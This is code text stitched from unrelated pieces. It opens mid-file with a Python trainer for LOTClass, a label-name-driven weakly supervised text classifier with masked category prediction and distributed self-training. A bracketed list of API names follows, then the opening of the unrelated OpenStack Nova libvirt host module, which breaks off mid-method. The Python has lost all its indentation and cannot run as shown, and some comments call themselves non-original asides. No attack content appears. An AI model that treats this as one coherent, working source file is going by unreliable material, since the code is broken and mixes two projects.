self.read_label_names(args.dataset_dir, args.label_names_file)
self.num_class = len(self.label_name_dict)
self.model = LOTClassModel.from_pretrained(self.pretrained_lm,
output_attentions=False,
output_hidden_states=False,
num_labels=self.num_class)
self.read_data(args.dataset_dir, args.train_file, args.test_file, args.test_label_file)
self.with_test_label = True if args.test_label_file is not None else False
self.temp_dir = f'tmp_{self.dist_port}'
self.mcp_loss = nn.CrossEntropyLoss()
self.st_loss = nn.KLDivLoss(reduction='batchmean')
self.update_interval = args.update_interval
self.early_stop = args.early_stop
# set up distributed training
def set_up_dist(self, rank):
dist.init_process_group(
backend='nccl',
init_method=f'tcp://localhost:{self.dist_port}',
world_size=self.world_size,
rank=rank
)
# create local model
model = self.model.to(rank)
model = DDP(model, device_ids=[rank], find_unused_parameters=True)
return model
# get document truncation statistics with the defined max length
def corpus_trunc_stats(self, docs):
doc_len = []
for doc in docs:
input_ids = self.tokenizer.encode(doc, add_special_tokens=True)
doc_len.append(len(input_ids))
print(f"Document max length: {np.max(doc_len)}, avg length: {np.mean(doc_len)}, std length: {np.std(doc_len)}")
trunc_frac = np.sum(np.array(doc_len) > self.max_len) / len(doc_len)
print(f"Truncated fraction of all documents: {trunc_frac}")
# convert a list of strings to token ids
def encode(self, docs):
encoded_dict = self.tokenizer.batch_encode_plus(docs, add_special_tokens=True, max_length=self.max_len, padding='max_length',
return_attention_mask=True, truncation=True, return_tensors='pt')
input_ids = encoded_dict['input_ids']
if self.verbose:
print(f"input_ids size (from encode): {input_ids.size()}")
print(f"input_ids (from encode): {input_ids}")
attention_masks = encoded_dict['attention_mask']
return input_ids, attention_masks
# convert list of token ids to list of strings
def decode(self, ids):
strings = self.tokenizer.batch_decode(ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)
return strings
# convert dataset into tensors
def create_dataset(self, dataset_dir, text_file, label_file, loader_name, find_label_name=False, label_name_loader_name=None):
loader_file = os.path.join(dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"Loading encoded texts from {loader_file}")
data = torch.load(loader_file)
else:
print(f"Reading texts from {os.path.join(dataset_dir, text_file)}")
corpus = open(os.path.join(dataset_dir, text_file), encoding="utf-8")
docs = [doc.strip() for doc in corpus.readlines()]
print(f"Converting texts into tensors.")
chunk_size = ceil(len(docs) / self.num_cpus)
chunks = [docs[x:x+chunk_size] for x in range(0, len(docs), chunk_size)]
results = Parallel(n_jobs=self.num_cpus)(delayed(self.encode)(docs=chunk) for chunk in chunks)
input_ids = torch.cat([result[0] for result in results])
print(f"Concatenated input_ids size: {input_ids.size()}")
attention_masks = torch.cat([result[1] for result in results])
print(f"Saving encoded texts into {loader_file}")
if label_file is not None:
print(f"Reading labels from {os.path.join(dataset_dir, label_file)}")
truth = open(os.path.join(dataset_dir, label_file))
labels = [int(label.strip()) for label in truth.readlines()]
labels = torch.tensor(labels)
data = {"input_ids": input_ids, "attention_masks": attention_masks, "labels": labels}
else:
data = {"input_ids": input_ids, "attention_masks": attention_masks}
torch.save(data, loader_file)
if find_label_name:
loader_file = os.path.join(dataset_dir, label_name_loader_name)
if os.path.exists(loader_file):
print(f"Loading texts with label names from {loader_file}")
label_name_data = torch.load(loader_file)
else:
print(f"Reading texts from {os.path.join(dataset_dir, text_file)}")
corpus = open(os.path.join(dataset_dir, text_file), encoding="utf-8")
docs = [doc.strip() for doc in corpus.readlines()]
print("Locating label names in the corpus.")
chunk_size = ceil(len(docs) / self.num_cpus)
chunks = [docs[x:x+chunk_size] for x in range(0, len(docs), chunk_size)]
results = Parallel(n_jobs=self.num_cpus)(delayed(self.label_name_occurrence)(docs=chunk) for chunk in chunks)
input_ids_with_label_name = torch.cat([result[0] for result in results])
attention_masks_with_label_name = torch.cat([result[1] for result in results])
label_name_idx = torch.cat([result[2] for result in results])
print(f"Concatenated input_ids_with_label_name size: {input_ids_with_label_name.size()}")
assert len(input_ids_with_label_name) > 0, "No label names appear in corpus!"
label_name_data = {"input_ids": input_ids_with_label_name, "attention_masks": attention_masks_with_label_name, "labels": label_name_idx}
loader_file = os.path.join(dataset_dir, label_name_loader_name)
print(f"Saving texts with label names into {loader_file}")
torch.save(label_name_data, loader_file)
return data, label_name_data
else:
return data
# find label name indices and replace out-of-vocab label names with [MASK]
def label_name_in_doc(self, doc):
doc = self.tokenizer.tokenize(doc)
if self.verbose:
print(doc)
label_idx = -1 * torch.ones(self.max_len, dtype=torch.long)
new_doc = []
wordpcs = []
idx = 1 # index starts at 1 due to [CLS] token
for i, wordpc in enumerate(doc):
wordpcs.append(wordpc[2:] if wordpc.startswith("##") else wordpc)
if self.verbose:
print(wordpcs)
if idx >= self.max_len - 1: # last index will be [SEP] token
break
if i == len(doc) - 1 or not doc[i+1].startswith("##"):
word = ''.join(wordpcs)
if word in self.label2class:
label_idx[idx] = self.label2class[word]
# replace label names that are not in tokenizer's vocabulary with the [MASK] token
if word not in self.vocab:
wordpcs = [self.tokenizer.mask_token]
new_word = ''.join(wordpcs)
if new_word != self.tokenizer.unk_token:
idx += len(wordpcs)
new_doc.append(new_word)
wordpcs = []
if (label_idx >= 0).any():
return ' '.join(new_doc), label_idx
else:
return None
# find label name occurrences in the corpus
def label_name_occurrence(self, docs):
text_with_label = []
label_name_idx = []
for doc in docs:
result = self.label_name_in_doc(doc)
if result is not None:
text_with_label.append(result[0])
label_name_idx.append(result[1].unsqueeze(0))
if len(text_with_label) > 0:
encoded_dict = self.tokenizer.batch_encode_plus(text_with_label, add_special_tokens=True, max_length=self.max_len,
padding='max_length', return_attention_mask=True, truncation=True, return_tensors='pt')
input_ids_with_label_name = encoded_dict['input_ids']
attention_masks_with_label_name = encoded_dict['attention_mask']
label_name_idx = torch.cat(label_name_idx, dim=0)
else:
input_ids_with_label_name = torch.ones(0, self.max_len, dtype=torch.long)
attention_masks_with_label_name = torch.ones(0, self.max_len, dtype=torch.long)
label_name_idx = torch.ones(0, self.max_len, dtype=torch.long)
return input_ids_with_label_name, attention_masks_with_label_name, label_name_idx
# read text corpus and labels from files
def read_data(self, dataset_dir, train_file, test_file, test_label_file):
self.train_data, self.label_name_data = self.create_dataset(dataset_dir, train_file, None, "train.pt",
find_label_name=True, label_name_loader_name="label_name_data.pt")
if test_file is not None:
self.test_data = self.create_dataset(dataset_dir, test_file, test_label_file, "test.pt")
# read label names from file
def read_label_names(self, dataset_dir, label_name_file):
label_name_file = open(os.path.join(dataset_dir, label_name_file))
label_names = label_name_file.readlines()
self.label_name_dict = {i: [word.lower() for word in category_words.strip().split()] for i, category_words in enumerate(label_names)}
print(f"Label names used for each class are: {self.label_name_dict}")
self.label2class = {}
self.all_label_name_ids = [self.mask_id]
self.all_label_names = [self.tokenizer.mask_token]
for class_idx in self.label_name_dict:
for word in self.label_name_dict[class_idx]:
assert word not in self.label2class, f"\"{word}\" used as the label name by multiple classes!"
self.label2class[word] = class_idx
if word in self.vocab:
self.all_label_name_ids.append(self.vocab[word])
self.all_label_names.append(word)
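    # Expected label name file layout (an aside, not original code): line i of
    # `label_names_file` holds the space-separated label name(s) of class i, e.g.
    #
    #   politics
    #   sports
    #   business technology
    #
    # read_label_names() above lower-cases the words and maps each one back to
    # its class index in self.label2class.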
# create dataset loader
def make_dataloader(self, rank, data_dict, batch_size):
if self.verbose:
print(f"data_dict['input_ids']: {data_dict['input_ids']}")
if "labels" in data_dict:
dataset = TensorDataset(data_dict["input_ids"], data_dict["attention_masks"], data_dict["labels"])
else:
dataset = TensorDataset(data_dict["input_ids"], data_dict["attention_masks"])
sampler = DistributedSampler(dataset, num_replicas=self.world_size, rank=rank)
dataset_loader = DataLoader(dataset, sampler=sampler, batch_size=batch_size, shuffle=False)
return dataset_loader
# filter out stop words and words in multiple categories
def filter_keywords(self, category_vocab_size=100):
all_words = defaultdict(list)
sorted_dicts = {}
for i, cat_dict in self.category_words_freq.items():
sorted_dict = {k:v for k, v in sorted(cat_dict.items(), key=lambda item: item[1], reverse=True)[:category_vocab_size]}
sorted_dicts[i] = sorted_dict
for word_id in sorted_dict:
all_words[word_id].append(i)
repeat_words = []
for word_id in all_words:
if len(all_words[word_id]) > 1:
repeat_words.append(word_id)
self.category_vocab = {}
for i, sorted_dict in sorted_dicts.items():
self.category_vocab[i] = np.array(list(sorted_dict.keys()))
stopwords_vocab = stopwords.words('english')
for i, word_list in self.category_vocab.items():
delete_idx = []
for j, word_id in enumerate(word_list):
word = self.inv_vocab[word_id]
if word in self.label_name_dict[i]:
continue
if not word.isalpha() or len(word) == 1 or word in stopwords_vocab or word_id in repeat_words:
delete_idx.append(j)
self.category_vocab[i] = np.delete(self.category_vocab[i], delete_idx)
def print_predictions(self, word_list):
if not self.verbose: return
print(40*'=')
print(self.decode(word_list))
print(40*'=')
# construct category vocabulary (distributed function)
def category_vocabulary_dist(self, rank, top_pred_num=50, loader_name="category_vocab.pt"):
if self.world_size > 1:
model = self.set_up_dist(rank)
else:
self.model.to(rank)
model = self.model
model.eval()
label_name_dataset_loader = self.make_dataloader(rank, self.label_name_data, self.eval_batch_size)
category_words_freq = {i: defaultdict(float) for i in range(self.num_class)}
wrap_label_name_dataset_loader = tqdm(label_name_dataset_loader) if rank == 0 else label_name_dataset_loader
try:
for batch in wrap_label_name_dataset_loader:
with torch.no_grad():
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
label_pos = batch[2].to(rank)
match_idx = label_pos >= 0
if self.verbose:
print(match_idx)
for input_id in input_ids:
self.print_predictions(input_id)
for attention_mask in input_mask:
print(attention_mask)
predictions = model(input_ids,
pred_mode="mlm",
token_type_ids=None,
attention_mask=input_mask)
if self.verbose:
print(predictions.size())
_, sorted_res = torch.topk(predictions[match_idx], top_pred_num, dim=-1)
label_idx = label_pos[match_idx]
for i, word_list in enumerate(sorted_res):
self.print_predictions(word_list)
for j, word_id in enumerate(word_list):
category_words_freq[label_idx[i].item()][word_id.item()] += 1
if self.verbose:
print(category_words_freq)
save_file = os.path.join(self.temp_dir, f"{rank}_"+loader_name)
torch.save(category_words_freq, save_file)
except RuntimeError as err:
self.cuda_mem_error(err, "eval", rank)
# construct category vocabulary
def category_vocabulary(self, top_pred_num=50, category_vocab_size=100, loader_name="category_vocab.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"Loading category vocabulary from {loader_file}")
self.category_vocab = torch.load(loader_file)
else:
            print("Constructing category vocabulary.")
if not os.path.exists(self.temp_dir):
os.makedirs(self.temp_dir)
if self.verbose:
print(f"Args: ({top_pred_num, loader_name}); World size: {self.world_size}")
#mp.spawn(self.category_vocabulary_dist, nprocs=self.world_size, args=(top_pred_num, loader_name))
self.category_vocabulary_dist(0, top_pred_num, loader_name)
gather_res = []
for f in os.listdir(self.temp_dir):
if f[-3:] == '.pt':
gather_res.append(torch.load(os.path.join(self.temp_dir, f)))
assert len(gather_res) == self.world_size, "Number of saved files not equal to number of processes!"
self.category_words_freq = {i: defaultdict(float) for i in range(self.num_class)}
for i in range(self.num_class):
for category_words_freq in gather_res:
for word_id, freq in category_words_freq[i].items():
self.category_words_freq[i][word_id] += freq
self.filter_keywords(category_vocab_size)
torch.save(self.category_vocab, loader_file)
if os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
for i, category_vocab in self.category_vocab.items():
print(f"Class {i} category vocabulary: {[self.inv_vocab[w] for w in category_vocab]}\n")
# prepare self supervision for masked category prediction (distributed function)
def prepare_mcp_dist(self, rank, top_pred_num=50, match_threshold=20, loader_name="mcp_train.pt"):
if self.world_size > 1:
model = self.set_up_dist(rank)
else:
model = self.model
model.eval()
train_dataset_loader = self.make_dataloader(rank, self.train_data, self.eval_batch_size)
all_input_ids = []
all_mask_label = []
all_input_mask = []
category_doc_num = defaultdict(int)
wrap_train_dataset_loader = tqdm(train_dataset_loader) if rank == 0 else train_dataset_loader
try:
for batch in wrap_train_dataset_loader:
with torch.no_grad():
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
predictions = model(input_ids,
pred_mode="mlm",
token_type_ids=None,
attention_mask=input_mask)
_, sorted_res = torch.topk(predictions, top_pred_num, dim=-1)
for i, category_vocab in self.category_vocab.items():
match_idx = torch.zeros_like(sorted_res).bool()
for word_id in category_vocab:
match_idx = (sorted_res == word_id) | match_idx
match_count = torch.sum(match_idx.int(), dim=-1)
valid_idx = (match_count > match_threshold) & (input_mask > 0)
valid_doc = torch.sum(valid_idx, dim=-1) > 0
if valid_doc.any():
mask_label = -1 * torch.ones_like(input_ids)
mask_label[valid_idx] = i
all_input_ids.append(input_ids[valid_doc].cpu())
all_mask_label.append(mask_label[valid_doc].cpu())
all_input_mask.append(input_mask[valid_doc].cpu())
category_doc_num[i] += valid_doc.int().sum().item()
all_input_ids = torch.cat(all_input_ids, dim=0)
all_mask_label = torch.cat(all_mask_label, dim=0)
all_input_mask = torch.cat(all_input_mask, dim=0)
save_dict = {
"all_input_ids": all_input_ids,
"all_mask_label": all_mask_label,
"all_input_mask": all_input_mask,
"category_doc_num": category_doc_num,
}
save_file = os.path.join(self.temp_dir, f"{rank}_"+loader_name)
torch.save(save_dict, save_file)
except RuntimeError as err:
self.cuda_mem_error(err, "eval", rank)
# prepare self supervision for masked category prediction
def prepare_mcp(self, top_pred_num=50, match_threshold=20, loader_name="mcp_train.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"Loading masked category prediction data from {loader_file}")
self.mcp_data = torch.load(loader_file)
else:
loader_file = os.path.join(self.dataset_dir, loader_name)
print("Preparing self supervision for masked category prediction.")
if not os.path.exists(self.temp_dir):
os.makedirs(self.temp_dir)
#mp.spawn(self.prepare_mcp_dist, nprocs=self.world_size, args=(top_pred_num, match_threshold, loader_name))
self.prepare_mcp_dist(0, top_pred_num, match_threshold, loader_name)
gather_res = []
for f in os.listdir(self.temp_dir):
if f[-3:] == '.pt':
gather_res.append(torch.load(os.path.join(self.temp_dir, f)))
assert len(gather_res) == self.world_size, "Number of saved files not equal to number of processes!"
all_input_ids = torch.cat([res["all_input_ids"] for res in gather_res], dim=0)
all_mask_label = torch.cat([res["all_mask_label"] for res in gather_res], dim=0)
all_input_mask = torch.cat([res["all_input_mask"] for res in gather_res], dim=0)
category_doc_num = {i: 0 for i in range(self.num_class)}
for i in category_doc_num:
for res in gather_res:
if i in res["category_doc_num"]:
category_doc_num[i] += res["category_doc_num"][i]
print(f"Number of documents with category indicative terms found for each category is: {category_doc_num}")
self.mcp_data = {"input_ids": all_input_ids, "attention_masks": all_input_mask, "labels": all_mask_label}
torch.save(self.mcp_data, loader_file)
if os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
for i in category_doc_num:
assert category_doc_num[i] > 10, f"Too few ({category_doc_num[i]}) documents with category indicative terms found for category {i}; " \
"try to add more unlabeled documents to the training corpus (recommend) or reduce `--match_threshold` (not recommend)"
print(f"There are totally {len(self.mcp_data['input_ids'])} documents with category indicative terms.")
# masked category prediction (distributed function)
def mcp_dist(self, rank, epochs=5, loader_name="mcp_model.pt"):
if self.world_size > 1:
model = self.set_up_dist(rank)
else:
model = self.model
mcp_dataset_loader = self.make_dataloader(rank, self.mcp_data, self.train_batch_size)
total_steps = len(mcp_dataset_loader) * epochs / self.accum_steps
optimizer = AdamW(filter(lambda p: p.requires_grad, model.parameters()), lr=2e-5, eps=1e-8)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0.1*total_steps, num_training_steps=total_steps)
try:
for i in range(epochs):
model.train()
total_train_loss = 0
if rank == 0:
print(f"Epoch {i+1}:")
wrap_mcp_dataset_loader = tqdm(mcp_dataset_loader) if rank == 0 else mcp_dataset_loader
model.zero_grad()
for j, batch in enumerate(wrap_mcp_dataset_loader):
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
labels = batch[2].to(rank)
mask_pos = labels >= 0
labels = labels[mask_pos]
# mask out category indicative words
input_ids[mask_pos] = self.mask_id
logits = model(input_ids,
pred_mode="classification",
token_type_ids=None,
attention_mask=input_mask)
logits = logits[mask_pos]
loss = self.mcp_loss(logits.view(-1, self.num_class), labels.view(-1)) / self.accum_steps
total_train_loss += loss.item()
loss.backward()
if (j+1) % self.accum_steps == 0:
# Clip the norm of the gradients to 1.0.
nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
model.zero_grad()
avg_train_loss = torch.tensor([total_train_loss / len(mcp_dataset_loader) * self.accum_steps]).to(rank)
gather_list = [torch.ones_like(avg_train_loss) for _ in range(self.world_size)]
if self.world_size > 1:
dist.all_gather(gather_list, avg_train_loss)
avg_train_loss = torch.tensor(gather_list)
if rank == 0:
print(f"Average training loss: {avg_train_loss.mean().item()}")
if rank == 0:
loader_file = os.path.join(self.dataset_dir, loader_name)
torch.save(self.model.state_dict(), loader_file)
except RuntimeError as err:
self.cuda_mem_error(err, "train", rank)
# masked category prediction
def mcp(self, top_pred_num=50, match_threshold=20, epochs=5, loader_name="mcp_model.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"\nLoading model trained via masked category prediction from {loader_file}")
else:
self.prepare_mcp(top_pred_num, match_threshold)
print(f"\nTraining model via masked category prediction.")
#mp.spawn(self.mcp_dist, nprocs=self.world_size, args=(epochs, loader_name))
self.mcp_dist(0, epochs, loader_name)
self.model.load_state_dict(torch.load(loader_file))
# prepare self training data and target distribution
def prepare_self_train_data(self, rank, model, idx):
target_num = min(self.world_size * self.train_batch_size * self.update_interval * self.accum_steps, len(self.train_data["input_ids"]))
if idx + target_num >= len(self.train_data["input_ids"]):
select_idx = torch.cat((torch.arange(idx, len(self.train_data["input_ids"])),
torch.arange(idx + target_num - len(self.train_data["input_ids"]))))
else:
select_idx = torch.arange(idx, idx + target_num)
assert len(select_idx) == target_num
idx = (idx + len(select_idx)) % len(self.train_data["input_ids"])
select_dataset = {"input_ids": self.train_data["input_ids"][select_idx],
"attention_masks": self.train_data["attention_masks"][select_idx]}
dataset_loader = self.make_dataloader(rank, select_dataset, self.eval_batch_size)
input_ids, input_mask, preds = self.inference(model, dataset_loader, rank, return_type="data")
gather_input_ids = [torch.ones_like(input_ids) for _ in range(self.world_size)]
gather_input_mask = [torch.ones_like(input_mask) for _ in range(self.world_size)]
gather_preds = [torch.ones_like(preds) for _ in range(self.world_size)]
dist.all_gather(gather_input_ids, input_ids)
dist.all_gather(gather_input_mask, input_mask)
dist.all_gather(gather_preds, preds)
input_ids = torch.cat(gather_input_ids, dim=0).cpu()
input_mask = torch.cat(gather_input_mask, dim=0).cpu()
all_preds = torch.cat(gather_preds, dim=0).cpu()
weight = all_preds**2 / torch.sum(all_preds, dim=0)
target_dist = (weight.t() / torch.sum(weight, dim=1)).t()
all_target_pred = target_dist.argmax(dim=-1)
agree = (all_preds.argmax(dim=-1) == all_target_pred).int().sum().item() / len(all_target_pred)
self_train_dict = {"input_ids": input_ids, "attention_masks": input_mask, "labels": target_dist}
return self_train_dict, idx, agree
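    # Worked example of the soft-target construction above (an aside, not
    # original code). With all_preds = [[0.7, 0.3], [0.6, 0.4], [0.2, 0.8]]:
    #   weight      = all_preds**2 / column_sum   -> squaring sharpens confident rows
    #   target_dist = row-normalised weight       -> [[0.845, 0.155],
    #                                                  [0.692, 0.308],
    #                                                  [0.059, 0.941]]
    # Each row still sums to 1, but high-confidence predictions are pushed closer
    # to one-hot, which is the distribution self-training then fits with KL loss.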
# train a model on batches of data with target labels
def self_train_batches(self, rank, model, self_train_loader, optimizer, scheduler, test_dataset_loader):
model.train()
total_train_loss = 0
wrap_train_dataset_loader = tqdm(self_train_loader) if rank == 0 else self_train_loader
model.zero_grad()
try:
for j, batch in enumerate(wrap_train_dataset_loader):
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
target_dist = batch[2].to(rank)
logits = model(input_ids,
pred_mode="classification",
token_type_ids=None,
attention_mask=input_mask)
logits = logits[:, 0, :]
preds = nn.LogSoftmax(dim=-1)(logits)
loss = self.st_loss(preds.view(-1, self.num_class), target_dist.view(-1, self.num_class)) / self.accum_steps
total_train_loss += loss.item()
loss.backward()
if (j+1) % self.accum_steps == 0:
# Clip the norm of the gradients to 1.0.
nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
model.zero_grad()
if self.with_test_label:
acc = self.inference(model, test_dataset_loader, rank, return_type="acc")
gather_acc = [torch.ones_like(acc) for _ in range(self.world_size)]
dist.all_gather(gather_acc, acc)
acc = torch.tensor(gather_acc).mean().item()
avg_train_loss = torch.tensor([total_train_loss / len(wrap_train_dataset_loader) * self.accum_steps]).to(rank)
gather_list = [torch.ones_like(avg_train_loss) for _ in range(self.world_size)]
dist.all_gather(gather_list, avg_train_loss)
avg_train_loss = torch.tensor(gather_list)
if rank == 0:
print(f"lr: {optimizer.param_groups[0]['lr']:.4g}")
print(f"Average training loss: {avg_train_loss.mean().item()}")
if self.with_test_label:
print(f"Test acc: {acc}")
except RuntimeError as err:
self.cuda_mem_error(err, "train", rank)
# self training (distributed function)
def self_train_dist(self, rank, epochs, loader_name="final_model.pt"):
model = self.set_up_dist(rank)
test_dataset_loader = self.make_dataloader(rank, self.test_data, self.eval_batch_size) if self.with_test_label else None
total_steps = int(len(self.train_data["input_ids"]) * epochs / (self.world_size * self.train_batch_size * self.accum_steps))
optimizer = AdamW(filter(lambda p: p.requires_grad, model.parameters()), lr=1e-6, eps=1e-8)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0.1*total_steps, num_training_steps=total_steps)
idx = 0
if self.early_stop:
agree_count = 0
for i in tqdm(range(int(total_steps / self.update_interval))):
self_train_dict, idx, agree = self.prepare_self_train_data(rank, model, idx)
# early stop if current prediction agrees with target distribution for 3 consecutive updates
if self.early_stop:
if 1 - agree < 1e-3:
agree_count += 1
else:
agree_count = 0
if agree_count >= 3:
break
self_train_dataset_loader = self.make_dataloader(rank, self_train_dict, self.train_batch_size)
self.self_train_batches(rank, model, self_train_dataset_loader, optimizer, scheduler, test_dataset_loader)
if rank == 0:
loader_file = os.path.join(self.dataset_dir, loader_name)
print(f"Saving final model to {loader_file}")
torch.save(model.module.state_dict(), loader_file)
# self training
def self_train(self, epochs, loader_name="final_model.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"\nFinal model {loader_file} found, skip self-training")
else:
rand_idx = torch.randperm(len(self.train_data["input_ids"]))
self.train_data = {"input_ids": self.train_data["input_ids"][rand_idx],
"attention_masks": self.train_data["attention_masks"][rand_idx]}
print(f"\nStart self-training.")
if self.world_size > 1:
mp.spawn(self.self_train_dist, nprocs=self.world_size, args=(epochs, loader_name))
else:
self.self_train_dist(0, epochs, loader_name)
# use a model to do inference on a dataloader
def inference(self, model, dataset_loader, rank, return_type):
if return_type == "data":
all_input_ids = []
all_input_mask = []
all_preds = []
elif return_type == "acc":
pred_labels = []
truth_labels = []
elif return_type == "pred":
pred_labels = []
model.eval()
try:
for batch in dataset_loader:
with torch.no_grad():
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
logits = model(input_ids,
pred_mode="classification",
token_type_ids=None,
attention_mask=input_mask)
logits = logits[:, 0, :]
if return_type == "data":
all_input_ids.append(input_ids)
all_input_mask.append(input_mask)
all_preds.append(nn.Softmax(dim=-1)(logits))
elif return_type == "acc":
labels = batch[2]
pred_labels.append(torch.argmax(logits, dim=-1).cpu())
truth_labels.append(labels)
elif return_type == "pred":
pred_labels.append(torch.argmax(logits, dim=-1).cpu())
if return_type == "data":
all_input_ids = torch.cat(all_input_ids, dim=0)
all_input_mask = torch.cat(all_input_mask, dim=0)
all_preds = torch.cat(all_preds, dim=0)
return all_input_ids, all_input_mask, all_preds
elif return_type == "acc":
pred_labels = torch.cat(pred_labels, dim=0)
truth_labels = torch.cat(truth_labels, dim=0)
samples = len(truth_labels)
acc = (pred_labels == truth_labels).float().sum() / samples
return acc.to(rank)
elif return_type == "pred":
pred_labels = torch.cat(pred_labels, dim=0)
return pred_labels
except RuntimeError as err:
self.cuda_mem_error(err, "eval", rank)
# use trained model to make predictions on the test set
def write_results(self, loader_name="final_model.pt", out_file="out.txt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
assert os.path.exists(loader_file)
print(f"\nLoading final model from {loader_file}")
self.model.load_state_dict(torch.load(loader_file))
self.model.to(0)
test_set = TensorDataset(self.test_data["input_ids"], self.test_data["attention_masks"])
test_dataset_loader = DataLoader(test_set, sampler=SequentialSampler(test_set), batch_size=self.eval_batch_size)
pred_labels = self.inference(self.model, test_dataset_loader, 0, return_type="pred")
out_file = os.path.join(self.dataset_dir, out_file)
print(f"Writing prediction results to {out_file}")
f_out = open(out_file, 'w')
for label in pred_labels:
f_out.write(str(label.item()) + '\n')
# print error message based on CUDA memory error
def cuda_mem_error(self, err, mode, rank):
if rank == 0:
print(err)
if "CUDA out of memory" in str(err):
if mode == "eval":
print(f"Your GPUs can't hold the current batch size for evaluation, try to reduce `--eval_batch_size`, current: {self.eval_batch_size}")
else:
print(f"Your GPUs can't hold the current batch size for training, try to reduce `--train_batch_size`, current: {self.train_batch_size}")
sys.exit(1)
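# Illustrative end-to-end driver (an aside, not the original train script): the
# argument names mirror exactly what __init__ above reads from `args`; every
# value below is a placeholder.
if __name__ == "__main__":
    from argparse import Namespace
    args = Namespace(
        verbose=False, max_len=512, dataset_dir="datasets/agnews/",
        dist_port=12345, gpus=1, train_batch_size=32, eval_batch_size=128,
        accum_steps=4, pretrained_lm="bert-base-uncased",
        label_names_file="label_names.txt", train_file="train.txt",
        test_file="test.txt", test_label_file="test_labels.txt",
        update_interval=50, early_stop=False)
    trainer = LOTClassTrainer(args)
    trainer.category_vocabulary(top_pred_num=50, category_vocab_size=100)
    trainer.mcp(top_pred_num=50, match_threshold=20, epochs=3)
    trainer.self_train(epochs=1)
    trainer.write_results(out_file="out.txt")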
| [
"torch.nn.CrossEntropyLoss",
"multiprocessing.cpu_count",
"numpy.array",
"torch.utils.data.distributed.DistributedSampler",
"torch.sum",
"sys.exit",
"joblib.delayed",
"torch.arange",
"os.path.exists",
"numpy.mean",
"os.listdir",
"nltk.corpus.stopwords.words",
"numpy.delete",
"numpy.max",
...
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes.
"""
from collections import defaultdict
import inspect
import operator
import os
import queue
import socket
import threading
import typing as ty
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import migration as libvirt_migrate
from nova.virt.libvirt import utils as libvirt_utils
if ty.TYPE_CHECKING:
import libvirt
else:
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue: queue.Queue[ty.Callable] = (
queue.Queue())
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue: ty.Optional[queue.Queue[ty.Callable]] = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
self._libvirt_proxy_classes = self._get_libvirt_proxy_classes(libvirt)
self._libvirt_proxy = self._wrap_libvirt_proxy(libvirt)
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
self._has_hyperthreading = None
@staticmethod
def _get_libvirt_proxy_classes(libvirt_module):
"""Return a tuple for tpool.Proxy's autowrap argument containing all
classes defined by the libvirt module except libvirtError.
"""
# Get a list of (name, class) tuples of libvirt classes
classes = inspect.getmembers(libvirt_module, inspect.isclass)
# Return a list of just the classes, filtering out libvirtError because
# we don't need to proxy that
return tuple([cls[1] for cls in classes if cls[0] != 'libvirtError'])
def _wrap_libvirt_proxy(self, obj):
